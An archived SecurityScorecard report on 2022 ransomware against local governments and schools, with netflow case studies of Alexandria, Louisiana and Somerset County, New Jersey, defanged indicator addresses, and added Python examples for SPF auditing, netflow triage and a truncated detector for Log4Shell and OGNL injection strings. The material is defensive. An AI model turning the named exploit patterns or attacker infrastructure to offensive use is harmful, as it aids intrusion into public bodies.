{
	"id": "8d32b395-78ed-4271-86aa-75b5bd972234",
	"created_at": "2026-04-06T00:15:34.476209Z",
	"updated_at": "2026-04-10T03:29:39.988708Z",
	"deleted_at": null,
	"sha1_hash": "3fc64f07e8dcc714888ed5bef6a950dfdc981c1e",
	"title": "The Increase in Ransomware Attacks on Local Governments - SecurityScorecard",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 654756,
	"plain_text": "The Increase in Ransomware Attacks on Local Governments -\r\nSecurityScorecard\r\nArchived: 2026-04-05 19:39:25 UTC\r\nExecutive Summary of Local Government Ransomware Attacks\r\nSecurityScorecard’s threat research team undertook a broad survey of recent developments in ransomware\r\nactivity affecting the state and local government and education (SLED) sectors.\r\nThe ALPHV/BlackCat and LockBit 2.0 ransomware groups appear to have been responsible for a\r\nnotable portion of activity targeting SLED organizations in 2022.\r\nRansomware groups have continued to modify their TTPs throughout 2022; although their main points\r\nof entry (phishing, compromised remote access services, and exploitation of known vulnerabilities) have\r\nremained broadly consistent, their specific methods have evolved; SecurityScorecard observed\r\nransomware groups exploiting new Apache and Confluence vulnerabilities in Q2 2022 attacks.\r\nThird-party risks have also persisted, with ransomware attacks against SLED institutions’ vendors\r\nleading to client data breaches.\r\nSecurityScorecard can support SLED organizations both before and after ransomware attacks:\r\nSecurityScorecard’s security rating platform gives organizations an outside-in view of their existing\r\ncybersecurity posture to take action against inherent vulnerabilities and risks. In addition, our\r\nAttack Surface Intelligence (ASI) and Automated Vendor Detection (AVD) products can enable\r\ncontinuous monitoring of their and their vendor’s digital assets.\r\nOur Cyber Risk Intelligence as a Service (CRIaaS) offering can provide tailored insights about\r\nthe threats facing them.\r\nIn the event of a successful or attempted attack, SecurityScorecard’s professional services unit can\r\nsupport incident response efforts.\r\nIntroduction\r\nIn Spring 2022, Lincoln College announced that it would permanently close on May 13 and noted that a\r\nDecember 2021 ransomware attack had contributed to its closure. 
Unfortunately, at the same time that Lincoln\r\nCollege was struggling in vain to remain open, other SLED (state, local and educational) institutions were\r\nsuffering new ransomware attacks, despite years of consistent evidence of ransomware groups’ particularly heavy\r\ntargeting of those sectors. On March 30, the Federal Bureau of Investigation (FBI) issued a private industry\r\nnotification (PIN) warning of the continued targeting of local governments by ransomware operators, noting that\r\nlocal Government Facilities Sector (GFS) entities were the second-most frequent victims to report ransomware\r\nincidents to the FBI in 2021. The notification goes on to highlight four incidents that affected county governments\r\nand identifies phishing, remote desktop protocol (RDP) compromise, and exploitation of unpatched vulnerabilities\r\nas the three most common means by which threat actors initially accessed victims’ systems. In another relevant\r\nPIN, the FBI noted in May 2022 that members of illicit forums regularly sell educational institutions’ credentials.\r\nExposed credentials may in fact be both a cause and effect of some attacks. Not only do ransomware groups often\r\nhttps://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments\r\nPage 1 of 13\n\nuse previously exposed credentials to access victim networks but, as the PIN notes, some attackers also use an\r\nintrusion that ultimately results in a ransomware deployment to harvest credentials from victim organizations. In a\r\nsummary study of 2021 ransomware incidents, Sophos surveyed a group of 499 information technology\r\nprofessionals in the education sector. They found that 44% of respondents’ organizations had experienced\r\nransomware attacks that year. Of those attacks, 58% resulted in the successful encryption of data, and 35% of\r\nsuccessful encryptions led to ransom payments. 
Moreover, Sophos’ statistics suggest that educational institutions\r\nmay be less capable of detecting attacks than other targets. The percentage of attacks resulting in encryption for\r\ntargets in education (58%) was 4 percentage points higher than the overall average (54%). In comparison, the percentage of\r\nrespondents reporting that attacks were stopped before encryption was 2 points lower in education than overall (37%\r\nvs. 39%), and the percentage that paid ransoms was 3 points higher (35% vs. 32%). Sophos also surveyed local\r\ngovernment personnel in its study, finding that local governments were the organizations least capable of\r\ndisrupting attacks prior to encryption: 69% of respondents from local governments that suffered attacks reported\r\nthat those attacks led to the encryption of their organizations’ data. Moreover, local governments were among the\r\nransomware victims that paid ransoms most frequently: 43% of local government respondents reported that their\r\norganizations had paid a ransom after an incident. Meanwhile, Emsisoft’s retrospective report on 2021\r\nransomware incidents found that ransomware attacks had affected 77 state and local governments and 1,043\r\nschools that year, leading to an estimated minimum of 36 data breaches in local government and 118 in education.\r\nThis may indicate decreased targeting of local government, as 2021’s 77 victim organizations are considerably\r\nfewer than the 113 recorded in each of 2019 and 2020. Emsisoft additionally notes that smaller municipalities\r\nmade up a larger proportion of 2021 victims than in previous years, whose ransomware victims included\r\nlarge cities like Atlanta and Baltimore. Unlike local government, according to Emsisoft’s research, the number of\r\nvictims in the education sector did not decrease notably in 2021. 2020 saw 84 attacks against 26 colleges or\r\nuniversities and 58 school districts (impacting 1,681 individual schools within those districts). 
In 2021, 88\r\nincidents occurred, and the number of higher-education victims remained 26, while the number of school districts\r\nincreased to 62. However, the number of schools affected by attacks against those districts decreased to 1,043. This\r\nsuggests that ransomware groups are targeting smaller educational organizations more often, just as they appear to\r\nhave begun targeting smaller municipalities. While 2022 is not over yet (and full-year statistics are therefore not\r\nyet available), early indications are that ransomware attacks against targets in both local government and\r\neducation will persist, if not increase. In early April, Recorded Future reported that 37 schools had suffered\r\nransomware attacks in the first quarter of 2022 alone, compared to 127 in all of 2021. This included seven\r\nconfirmed victims in higher education:\r\nNorth Carolina A\u0026T University\r\nOhlone College\r\nSavannah State University\r\nUniversity of Detroit Mercy\r\nCentralia College\r\nPhillips Community College of the University of Arkansas\r\nNational University College (NUC University)\r\nIn response to a later attack, another expert reported at the end of April that ransomware had affected 12\r\ninstitutions of higher education up to that point in the year, with 10 of those incidents involving data theft,\r\nadditionally noting that 9 school districts comprising 234 individual schools had suffered attacks up to that point\r\nin 2022. If attacks continue at the same rate, these figures, like the estimates above, suggest that more attacks on the education sector will occur\r\nin 2022 than in 2021. Unlike education, however, attacks against local\r\ngovernments may be decreasing. 
According to one estimate, as of early June, 22 local governments had suffered\r\nattacks, but by the same point in 2021, 36 local government attacks had occurred.\r\nParticularly Active Groups: ALPHV/BlackCat and LockBit 2.0\r\nAmong the year’s publicly disclosed ransomware attacks against higher education and local government, the LockBit\r\n2.0 and ALPHV/BlackCat groups have figured particularly prominently. Of the above reports, ALPHV claimed\r\nresponsibility for the attacks on North Carolina A\u0026T and Phillips Community College, while LockBit 2.0 claimed\r\nthe University of Detroit Mercy and NUC University attacks. ALPHV subsequently claimed additional attacks on\r\nFlorida International University and Regina Public Schools, and LockBit 2.0 claimed an attack against Mercyhurst\r\nUniversity (though shortly after claiming the attack, LockBit removed Mercyhurst’s entry from its leak site). Most\r\nrecently, on June 3, 2022, the city of Alexandria, Louisiana reported that it had suffered a breach resulting from\r\nan attack by ALPHV. Commentators have noted that, beyond the predictable threat to leak data, which the group directed at state\r\nofficials, it took a particularly aggressive stance toward media coverage of the incident. ALPHV (also\r\ntracked as BlackCat) and LockBit 2.0 are both ransomware-as-a-service (RaaS) operations that reportedly conduct\r\ndouble and, in some cases, triple extortion against their victims: in addition to demanding a ransom to decrypt\r\nencrypted systems, they threaten to publish stolen data on their leak sites and occasionally launch\r\ndistributed denial of service (DDoS) attacks against their victims to apply additional pressure by further\r\ndisrupting their operations and recovery efforts. Both groups also often employ Cobalt Strike in the course of\r\ntheir attacks. 
As its name suggests, LockBit 2.0 is a continuation of the earlier LockBit ransomware operation,\r\nwhich first surfaced in 2019 (LockBit 2.0 appeared in Summer 2021). According to an FBI advisory released in\r\nFebruary 2022, LockBit 2.0’s affiliates have accessed target systems by a variety of means, including remote\r\naccess purchased through initial access brokers, exploitation of vulnerabilities both novel and published, and\r\nthrough malicious insiders. More recent analysis of the group found that LockBit 2.0’s operators have sought\r\naffiliates who can help compromise target systems through phishing, remote services including RDP and VPN,\r\npreviously exposed credentials, and insider access. ALPHV first appeared in early December 2021. Early analysis\r\nfound the BlackCat strain of ransomware to be particularly sophisticated and that it was the first professionally-deployed ransomware to be written in Rust. Later, in April 2022, the FBI warned that as of March,\r\nALPHV/BlackCat had already compromised 60 organizations and noted that the operation likely shared personnel\r\nwith the BlackMatter and DarkSide groups. DarkSide achieved considerable notoriety for its attack on Colonial\r\nPipeline, which likely led the group to rebrand, first as BlackMatter and later as BlackCat. That warning notes that\r\nattackers normally exploit previously exposed credentials to access victim systems, subsequently escalating\r\nprivileges and moving laterally while disabling security systems to avoid detection. As with many other\r\nransomware operations, the group steals documents from victim systems in order to conduct secondary extortion\r\nand uses Cobalt Strike after initially compromising victim systems. 
More recent research has found that some\r\nBlackCat affiliates have exploited a Microsoft Exchange vulnerability to gain initial access to unpatched servers;\r\nalthough the research does not explicitly name the Exchange vulnerability in question, it may be the widespread\r\nProxyLogon vulnerability (CVE-2021-26855), first disclosed in early 2021, given that the researchers link to guidance about it in\r\nthe newer report.\r\nOngoing Risks of Local Government: Third-Party/Supply Chain Breaches\r\nThird-party risk has been a recurring topic of concern within the cybersecurity community, and third-party\r\nbreaches have proven particularly relevant in discussions of the impact of ransomware upon government and\r\neducational institutions. In addition to direct attacks against them, ransomware attacks against other businesses\r\nhave also led to breaches of government and educational institutions’ data. In July 2020, Blackbaud, a technology\r\nprovider that caters to nonprofit organizations, notified customers (including many K-12 schools, colleges, and\r\nuniversities) that a February ransomware attack had also exposed their data, but that Blackbaud had paid the\r\nransom, partially in hopes of preventing the attackers’ publication of the stolen data. The Accellion FTA\r\ncompromise that became prominent in early 2021 is a particularly wide-ranging example of the intersection\r\nbetween supply-chain cyber risk and ransomware. Between December 2020 and January 2021, Accellion patched\r\na group of vulnerabilities in its 20-year-old FTA file transfer software. 
However, by that point, threat actors had\r\nalready exploited them to steal data from Accellion customers and partners and subsequently began contacting\r\nthose customers and partners to threaten to leak the stolen data and demand a ransom; by February 2021, victim\r\ndata had begun appearing on the Cl0p ransomware group’s leak site. Analysts estimated at the time that the attacks\r\naffected 100 organizations, 25 of which experienced severe data thefts. Educational institutions, including\r\nStanford University, the University of California system, the University of Colorado, the University of Miami, the\r\nUniversity of Maryland, Baltimore, and at least one state government were among the affected organizations.\r\nThus far, breaches at two different educational technology (edtech) providers, Illuminate Education and Battelle\r\nfor Kids, have affected public school districts’ data in 2022; at least one of these (Battelle) was the result of a\r\nransomware attack. Illuminate Education announced in January that service disruptions reported by customers,\r\nincluding the New York City public school system, were the result of an unspecified security incident. Then, in\r\nMarch, Illuminate informed New York City officials that the incident had also led to a data breach that exposed\r\n820,000 New York City students’ personal data. Some features of this incident resemble a ransomware attack, but\r\npublic sources have not yet formally identified it as one. In a similar event publicly acknowledged as a\r\nransomware incident, in April, a group of Ohio school districts began announcing breaches resulting from a\r\nDecember 2021 attack against edtech provider Battelle for Kids, with the much larger Chicago public school\r\nsystem announcing in May that the Battelle attack had also impacted it, leading to a breach of 500,000 students’\r\nand 60,000 teachers’ data. 
Even in the wake of their respective security incidents, SecurityScorecard’s platform\r\nindicates that Battelle and Illuminate both suffer from issues attackers (including ransomware operators) could\r\nexploit. Previous leaks have exposed personal information belonging to employees of both organizations, and\r\nother leaks have exposed passwords associated with Battelle email addresses. An attacker could use exposed\r\npersonal information to craft compelling phishing messages, and ransomware attacks have often used employee\r\ncredentials (like passwords that employees reuse across different accounts and fail to change after their exposure in\r\na breach) to access target systems. Both could be susceptible to phishing attacks: 17 domains attributed to Battelle\r\nfor Kids lack Sender Policy Framework (SPF) records, and the SPF record for one Illuminate Education\r\nsubsidiary, IO Education, indicates a misconfiguration. SPF can help prevent email spoofing, but in its absence,\r\nthreat actors can more easily craft and distribute phishing emails that are more convincing because they appear\r\nto have originated from within the target organization. SecurityScorecard also observed open FTP services at an IP\r\naddress attributed to Battelle as recently as June 17. Speaking generally, attackers may take an interest in file-sharing services because they offer a means of accessing victim data, but some ransomware groups have taken a\r\nparticular interest in FTP specifically. For example, Sophos warned in February 2021 that it had observed the Conti group using\r\nFTP to steal victim data. 
Software in use on June 20 and 21 at Illuminate-attributed IP addresses also appeared to\r\nbe affected by high-severity vulnerabilities first identified in 2016 and 2018, which could indicate patch\r\nmanagement issues that could be especially concerning given that ransomware often exploits unpatched\r\nvulnerabilities. Other issues, while not necessarily targeted by ransomware groups, may nonetheless indicate an\r\nongoing risk. SecurityScorecard has previously researched the links between our scorecard factors and\r\nransomware attacks to identify which of the issues we observe are more prevalent among ransomware victims\r\nthan in other organizations. Many of the issue types identified in this research also affect Battelle for Kids and\r\nIlluminate Education. Exposed personal information (observed for both companies, as discussed above) was\r\nalmost 40% more prevalent among the ransomware cohort than non-victim organizations. SecurityScorecard\r\nobserved TLS services that support weak protocols in use in Battelle’s and Illuminate’s networks; this finding is\r\nover 30% more prevalent among ransomware victims than non-victims. SecurityScorecard’s earlier research also\r\nnoted that two other TLS flaws, TLS Service Supports Weak Cipher Suite, and Certificate Without Revocation\r\nControl, are respectively 30% and 29% more prevalent in the ransomware cohort than in the control group.\r\nSecurityScorecard has found a TLS Service at a Battelle for Kids-attributed IP address to support a weak cipher\r\nsuite and a TLS certificate at an Illuminate Education-linked IP address to lack revocation control. 
Together, these\r\nfindings suggest that both Battelle for Kids and Illuminate Education may share a profile similar to many\r\nransomware victims, even if only one of the two companies has publicly disclosed a ransomware incident in\r\nrecent months.\r\nLocal Government Ransomware Attack Case Studies\r\nAlexandria, Louisiana\r\nSecurityScorecard’s investigation into the attack against the government of Alexandria, Louisiana, by the ALPHV\r\ngroup revealed some possible insights, including a series of suspicious network flows (netflows) in the days\r\nbefore the attack. On May 30 and 31, 151 flows between 199.38.59[.]80 (an IP address attributed to the City of\r\nAlexandria) and 149.255.169[.]10 took place over UDP. These occurred within fairly narrow timeframes: the 25\r\nflows on May 30 occurred between 16:26:25 and 16:28:54 UTC, and the 126 flows on May 31 all occurred\r\nbetween 11:22:14 and 11:42:12 UTC. SecurityScorecard’s netflow tool has previously linked 149.255.169[.]10 to\r\nmalicious bot and Cobalt Strike activity. ASI has, moreover, revealed remote access services in use at open ports\r\nat the Alexandria IP address in question (the ASI screenshot is not reproduced in this archived copy).\r\nASI also found a port commonly associated with VPN activity open at the other IP address involved in these flows: TCP port 1723,\r\nthe control channel of the Point-to-Point Tunneling Protocol (PPTP), is open at 149.255.169[.]10. PPTP is widely regarded as\r\nobsolete and insecure, and its data channel runs over GRE rather than UDP, so the UDP flows observed here are not PPTP traffic\r\nthemselves; other VPN protocols (OpenVPN, WireGuard, and IPsec/IKE) do run over UDP, so the open PPTP port and the UDP flows\r\ntogether are consistent with a host offering VPN service over more than one protocol.\r\nWhile VPNs do not necessarily indicate malicious activity, threat actors use them regularly to obfuscate their\r\ntraffic and communications. 
These 151 flows make up the bulk of the observed traffic involving this particular\r\nAlexandria-attributed IP (199.38.59[.]80), which comprised 186 flows in total, and may represent a particularly\r\nconcentrated period within a broader pattern of suspicious activity. The first flow within SecurityScorecard’s\r\nsample took place between 199.38.59[.]80 and 41.93.45[.]129 on May 21. Other vendors have observed this IP\r\naddress leading to a download of a malicious JavaScript file, and ASI observed a malware infection active there on\r\nthe same day as this flow (screenshot not reproduced in this archived copy).\r\nThe malicious file in question has, moreover, figured in previous SecurityScorecard research, which linked it to\r\npossible Russian C2 infrastructure. The byte count recorded for this flow (given as 1500, or 15 KB; 1500 bytes would in fact be\r\n1.5 KB, so the two figures do not agree) is of the same order as the size of the JavaScript file in question (10.66 KB). The following day (May 22), the same Alexandria IP address\r\ncommunicated with a neighboring IP address, 41.93.45[.]130. Vendors have linked that address to malicious\r\nactivity, and ASI observed malware infections at it only slightly before this flow (screenshot not reproduced in this archived copy).\r\nThen, on May 23, a 327-KB data transfer from 178.128.55[.]198 took place. Nine vendors have detected\r\nmalicious activity involving this IP address; it has hosted a domain that appears to impersonate Apple (icdn-appieid[.]com) and, more recently, was observed leading to a download of a malicious text file detected as\r\nWin32.Trojan.Raasj.Auto. These three flows used TCP, but after them, many others, like the 151 involving\r\n149.255.169[.]10, used UDP. This sudden shift to UDP may reflect the use of a VPN to communicate with threat\r\nactor infrastructure following an initial compromise represented by these first three suspicious TCP flows. 
While\r\nthis traffic may be benign (internal log data could further elucidate it), these findings suggest that the above-discussed IP addresses merit further investigation, as the timing of the traffic involving them suggests that they\r\nmay have played a role in the attack against the Alexandria government.\r\nSomerset County, New Jersey\r\nOn May 24, the government of Somerset County, New Jersey, announced it had suffered a ransomware attack\r\nearlier that day, which disabled the county’s email system and disrupted Somerset County Clerk and Surrogate\r\nservices requiring internet connectivity or access to county databases. Following the disclosure of the incident,\r\nSecurityScorecard researchers consulted our internal scan data and netflow tool in hopes of enriching the publicly\r\navailable information about the attack. SecurityScorecard observed several issues of the kinds commonly leveraged by\r\nransomware groups on Somerset County’s network. SecurityScorecard observed that Somerset County’s main\r\ndomain, somerset[.]nj[.]us, lacked an SPF (Sender Policy Framework) record as recently as May 23. SPF can help\r\nprevent email spoofing by letting receiving mail servers verify that emails claiming to originate from a given domain are coming from a\r\nserver with a legitimate relationship to that domain, thus reducing the risk of successful phishing attacks; it only takes effect\r\nwhere receivers check it, and it is most effective when paired with a DMARC policy instructing receivers to quarantine or reject\r\nmail that fails the check. A threat\r\nactor could, for example, have sent spoofed emails from somerset[.]nj[.]us to phish Somerset County employees\r\nat the beginning of the ransomware attack against the county. As SecurityScorecard’s recent cases have also\r\nrevealed, phishing remains a common means of initial access for ransomware. 
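The SPF findings in this report (domains with no record at all, and one record that is misconfigured) are the kind of condition that can be checked mechanically. What follows is an added example, not SecurityScorecard tooling and not part of the original report: a minimal SPF evaluator in the spirit of RFC 7208 that resolves the ip4, ip6, include and all mechanisms against an embedded DNS table, plus an audit routine that reports the failure modes discussed here. The .test domains, addresses and TXT records are constructed for the example; nothing here is a real record for any organization named on this page.

```python
'''Minimal SPF evaluator (RFC 7208 subset), added as an example; not
SecurityScorecard tooling. DNS answers are an embedded, constructed table so
the script runs offline.'''
import ipaddress

# Constructed DNS data for invented .test domains (not real records).
DNS = {
    'example-county.test': {'TXT': []},                      # no SPF record at all
    'example-vendor.test': {
        'TXT': ['v=spf1 ip4:203.0.113.0/24 include:mail.example-vendor.test -all'],
    },
    'mail.example-vendor.test': {'TXT': ['v=spf1 ip4:198.51.100.10 ~all']},
    'misconfigured.test': {
        # two SPF records: a permanent error under RFC 7208 section 4.5
        'TXT': ['v=spf1 ip4:203.0.113.5 -all', 'v=spf1 +all'],
    },
    'permissive.test': {'TXT': ['v=spf1 +all']},             # authorises any sender
}

QUALIFIERS = {'+': 'pass', '-': 'fail', '~': 'softfail', '?': 'neutral'}

def get_spf(domain):
    '''Return the SPF TXT record for a domain, None if there is none, or raise
    ValueError when more than one exists (permerror).'''
    records = [t for t in DNS.get(domain, {}).get('TXT', [])
               if t.lower().startswith('v=spf1')]
    if len(records) > 1:
        raise ValueError('permerror: multiple SPF records for ' + domain)
    return records[0] if records else None

def check_host(ip, domain, depth=0):
    '''Evaluate a sending IP against the SPF policy of domain. Handles the ip4,
    ip6, include and all mechanisms; a, mx, ptr, exists and redirect are not
    modelled here and are skipped.'''
    if depth > 10:                      # RFC 7208 limit on DNS-querying terms
        return 'permerror'
    try:
        record = get_spf(domain)
    except ValueError:
        return 'permerror'
    if record is None:
        return 'none'
    addr = ipaddress.ip_address(ip)
    for term in record.split()[1:]:
        qualifier = '+'
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(':')
        name = name.lower()
        if name == 'all':
            return QUALIFIERS[qualifier]
        if name in ('ip4', 'ip6'):
            if addr in ipaddress.ip_network(arg, strict=False):
                return QUALIFIERS[qualifier]
        elif name == 'include':
            if check_host(ip, arg, depth + 1) == 'pass':
                return QUALIFIERS[qualifier]
    return 'neutral'                    # nothing matched and no all term

def audit(domain):
    '''Report the failure modes discussed in the text: no record, a record that
    authorises every sender, or duplicate records.'''
    try:
        record = get_spf(domain)
    except ValueError:
        return 'MULTIPLE_SPF_RECORDS'
    if record is None:
        return 'NO_SPF_RECORD'
    if record.split()[-1].lower() in ('+all', 'all'):
        return 'SPF_ALLOWS_ANY_SENDER'
    return 'OK'

if __name__ == '__main__':
    for d in DNS:
        print(d, audit(d), check_host('192.0.2.1', d))
```

Against live DNS, the DNS table would be replaced by a TXT lookup (for instance via dnspython), and a complete implementation also needs the a, mx, exists and redirect mechanisms and the macro syntax. The audit covers only the conditions discussed above; a record that is syntactically valid can still be too permissive in other ways, such as an include of a large shared provider that the organization does not actually use.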
With that said, recent years have\r\nalso seen ransomware groups use the Remote Desktop Protocol (RDP) to access victim systems with increasing frequency.\r\nSecurityScorecard additionally observed FTP services publicly available at three Somerset County-attributed IP\r\naddresses, 64.206.95[.]16, 64.206.95[.]15, and 64.206.95[.]23. As discussed above, researchers have observed\r\nransomware groups and other threat actors exploiting FTP in the past. As seen above, exploitation of known\r\nvulnerabilities also remains a common feature of ransomware attacks, and SecurityScorecard observed a number\r\nof CVEs affecting Somerset County IP addresses. Five of these addresses in particular, 64.206.95[.]22, 64.206.95[.]27,\r\n64.206.95[.]24, 64.206.77[.]196, and 64.206.95[.]21, may be affected by one especially prominent and relatively\r\nrecent vulnerability, Spring4Shell (CVE-2022-22965), the exploitation of which, some commentators note, could facilitate the\r\ndeployment of ransomware. SecurityScorecard’s netflow data revealed a notable amount of traffic that may\r\nindicate attackers’ use of Cobalt Strike against Somerset County. From April 24 to May 24 (the month leading up\r\nto the Somerset County government’s detection of the attack), the netflow data available to SecurityScorecard\r\nrevealed 41,972 flows between the IP addresses attributed to Somerset County and IP addresses linked to Cobalt\r\nStrike command-and-control infrastructure. Some of this traffic may have been part of the attack reported on May\r\n24. According to Cisco research conducted in 2020, 66% of ransomware attacks observed that year used Cobalt\r\nStrike. More recently, in February 2022, Cybereason’s Global SOC Team analyzed an attack they attribute to a\r\nConti ransomware affiliate that began with spear phishing directed at employees of the victim organization and\r\nlater deployed Cobalt Strike. Given the SPF issue mentioned above, it is not unthinkable that the attack against\r\nSomerset County followed a similar trajectory. 
To identify the most concerning IP addresses involved in the\r\nalmost 42,000 flows that could reflect the use of Cobalt Strike against Somerset County, SecurityScorecard\r\nresearchers first limited the results to those involving Somerset County IP addresses where SecurityScorecard’s\r\nplatform observed issues, as these issues could represent vulnerabilities that an adversary may be more likely to\r\ntarget. They then sorted the results by byte count in order to identify the Cobalt Strike-tagged IP addresses\r\ninvolved in the largest data transfers. The top 10 IP addresses linked to Cobalt Strike and involved in large data\r\ntransfers to or from Somerset County are the following (in order of byte count):\r\n1. 165.225.242[.]248\r\n2. 208.87.239[.]180\r\n3. 208.40.200[.]194\r\n4. 192.216.142[.]51\r\n5. 162.142.125[.]211\r\n6. 174.128.243[.]54\r\n7. 154.89.5[.]80\r\n8. 70.39.102[.]189\r\n9. 128.14.133[.]58\r\n10. 174.128.243[.]54\r\n(174.128.243[.]54 appears twice in this list as published, at positions 6 and 10, so the list names nine distinct addresses; ranking by\r\ntotal bytes per remote address rather than per flow avoids such duplicates.)\r\nResearchers then identified additional traffic involving other IP addresses located in the same countries as these\r\nknown malicious IPs, where the countries in question are ones with which a US local government would be\r\nunlikely to communicate. This led SecurityScorecard to observe large data transfers between vulnerable Somerset\r\nassets and IP addresses in India and Bangladesh in the weeks leading up to the attack. Researchers observed a total\r\nof 2,109 flows between the county government’s assets and Indian IP addresses. 
Traffic between Indian IP\r\naddresses and those attributed to the Somerset County government is in and of itself something of an anomaly: the\r\nvast majority of traffic occurred within the US (the graph illustrating this is not reproduced in this archived copy).\r\nDespite the low frequency of the traffic, the volume of the data it transferred was quite large: flows involving\r\nIndian IP addresses had an average byte count of 3,363,767, more than double the overall average (1,576,056\r\nbytes). Because traffic between Somerset County IPs and Indian IPs appears uncommon, the amount of data\r\ntransferred in that traffic was anomalously large. The transfers occurred in the lead-up to a ransomware\r\ndeployment, and threat actors have been observed abusing Indian infrastructure in previous attacks. Of the IP\r\naddresses appearing in this traffic, 103.240.208[.]197 may represent a particular cause for concern.\r\nSecurityScorecard’s netflow tool has associated it with Cobalt Strike, and researchers detected a transfer of\r\n156,000 bytes between it and one vulnerable Somerset County IP address, 64.206.95[.]4, on May 24, the date\r\nSomerset County detected and disclosed the attack against it. In contrast to those located in India, the Bangladeshi\r\nIP addresses communicating with Somerset County assets were both rarer and transferred smaller amounts of data.\r\nBetween April and May 24, they only appeared in 40 flows and had an average byte count of 506,863. However,\r\nin addition to the links SecurityScorecard’s netflow tool established between some of these IPs and malicious bot\r\nactivity, the heavy concentration of the traffic on certain specific dates appears somewhat suspicious. Of these 40\r\nflows, 18 occurred on May 8 and involved larger data transfers than the overall average of 506,863; on May 8, the\r\nflows’ average byte count was 1,113,500. 
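The triage just described for Somerset County (restricting to county hosts with observed issues, ranking tagged remote addresses by byte volume, comparing per-country flow counts and average sizes against the traffic as a whole, and then looking for dates on which a rare country's flows cluster) can be written down as a short script. The following is an added example and not SecurityScorecard's netflow tool; the flow records, country codes, tags and the VULNERABLE_ASSETS set are constructed for illustration and use documentation address ranges rather than the Somerset County or remote addresses cited above.

```python
'''Netflow triage in the style of the Somerset County analysis. Added example;
not the SecurityScorecard netflow tool. All records below are constructed.'''
from collections import defaultdict
from statistics import mean

# Constructed sample flows: (date, county_ip, remote_ip, remote_country, bytes, tags).
# Addresses come from documentation ranges, not from the report.
FLOWS = [
    ('2022-05-02', '192.0.2.4',  '198.51.100.7', 'US', 1_200_000, set()),
    ('2022-05-02', '192.0.2.4',  '198.51.100.9', 'US',   900_000, set()),
    ('2022-05-03', '192.0.2.22', '203.0.113.10', 'US', 2_000_000, {'cobalt-strike'}),
    ('2022-05-03', '192.0.2.22', '203.0.113.10', 'US', 1_500_000, {'cobalt-strike'}),
    ('2022-05-05', '192.0.2.4',  '203.0.113.44', 'IN', 3_400_000, set()),
    ('2022-05-08', '192.0.2.22', '203.0.113.61', 'BD', 1_100_000, {'bot'}),
    ('2022-05-08', '192.0.2.22', '203.0.113.61', 'BD', 1_127_000, {'bot'}),
    ('2022-05-12', '192.0.2.27', '203.0.113.62', 'BD',     7_000, {'cobalt-strike'}),
    ('2022-05-24', '192.0.2.4',  '203.0.113.45', 'IN',   156_000, {'cobalt-strike'}),
]
# County hosts where scan data showed issues (open FTP, unpatched CVEs, ...);
# hypothetical, chosen to match the constructed flows.
VULNERABLE_ASSETS = {'192.0.2.4', '192.0.2.22', '192.0.2.27'}

def top_tagged_remotes(flows, tag, n=10):
    '''Steps 1 and 2: keep flows touching a vulnerable county host, then rank
    remote IPs carrying the given tag by total bytes. Aggregating per remote
    address (not per flow) keeps one address from appearing twice.'''
    totals = defaultdict(int)
    for _, local, remote, _, size, tags in flows:
        if local in VULNERABLE_ASSETS and tag in tags:
            totals[remote] += size
    return sorted(totals, key=totals.get, reverse=True)[:n]

def country_anomalies(flows, min_share=0.25):
    '''Step 3: countries that are rare in the traffic (under min_share of all
    flows) yet move more data per flow than the overall average. Returns a
    mapping of country code to its rounded average byte count.'''
    by_country = defaultdict(list)
    for _, _, _, country, size, _ in flows:
        by_country[country].append(size)
    overall = mean(size for _, _, _, _, size, _ in flows)
    return {c: round(mean(v)) for c, v in by_country.items()
            if len(v) / len(flows) < min_share and mean(v) > overall}

def date_bursts(flows, country):
    '''Step 4: for one country, dates on which several of its flows cluster
    and move more data than that country average (the May 8 pattern).'''
    by_date = defaultdict(list)
    for date, _, _, c, size, _ in flows:
        if c == country:
            by_date[date].append(size)
    if not by_date:
        return []
    avg = mean(s for v in by_date.values() for s in v)
    return sorted(d for d, v in by_date.items() if len(v) > 1 and mean(v) > avg)

if __name__ == '__main__':
    print(top_tagged_remotes(FLOWS, 'cobalt-strike'))
    print(country_anomalies(FLOWS))
    for c in ('IN', 'BD'):
        print(c, date_bursts(FLOWS, c))
```

The thresholds (a quarter of all flows, the overall mean) are deliberately simple; on a real month of flows one would replace them with a baseline built from a period before the incident window, so that the incident traffic does not inflate the average it is being compared against.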
Although the IP involved in the May 8 flows, 103.92.85[.]202, has not previously been\r\nlinked to ransomware, it likely merits investigation, if not blocking: traffic between Somerset County IPs\r\nand Bangladeshi IPs appears uncommon, the amount of data transferred in that traffic was anomalously large, and\r\nthe transfers occurred in the lead-up to a ransomware deployment. Moreover, other members of the cybersecurity\r\ncommunity have previously linked it to brute force attacks targeting RDP, and ransomware groups often compromise\r\nRDP for initial access. Traffic on another day, May 12, represented the next-largest portion of the flows observed:\r\n14 occurred on that day. They all involved one Bangladeshi IP, 37.111.205[.]165, which another vendor has linked\r\nto Cobalt Strike. Their average byte count (6,957.5 bytes), however, was considerably smaller than the one\r\nobserved on May 8.\r\nFindings from Ransomware Attacks on Local Government\r\nRecent incident response efforts in which SecurityScorecard was involved do, in general, indicate that\r\nransomware groups’ TTPs have remained largely continuous with those employed in 2021, with the exploitation\r\nof known vulnerabilities remaining a consistent feature of recent attacks. However, the vulnerabilities exploited\r\nhave changed as researchers publish new CVEs. Thus far in 2022, Confluence, GitHub, and Apache\r\nvulnerabilities have figured particularly prominently in SecurityScorecard cases. Since its disclosure in December 2021,\r\nCVE-2021-44228 (the Apache Log4j vulnerability also tracked as “Log4Shell”)\r\nhas figured in approximately six incidents to which SecurityScorecard responded. 
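As an added example (not from the report), the following detection logic scans constructed web-server log lines for the two exploitation patterns that figure in this section: the Log4Shell ${jndi:...} lookup, which attackers routinely obfuscate with nested ${lower:...}, ${upper:...} and ${...:-x} lookups, and an OGNL expression in the request path, the shape used by the publicly reported exploits for Atlassian's Confluence vulnerability CVE-2022-26134. The log format (pipe-separated timestamp, source address, request path and User-Agent) is a constructed simplification of a real access log, the addresses are from documentation ranges, and the Confluence-style path carries a harmless expression rather than a command.

```python
'''Detection of expression-injection attempts in web logs, covering Log4Shell
JNDI lookups (including nested-lookup obfuscation) and OGNL expressions in the
request path. Added example; not from the report.'''
from urllib.parse import unquote

# Constructed log lines: timestamp|source_ip|request_path|user_agent.
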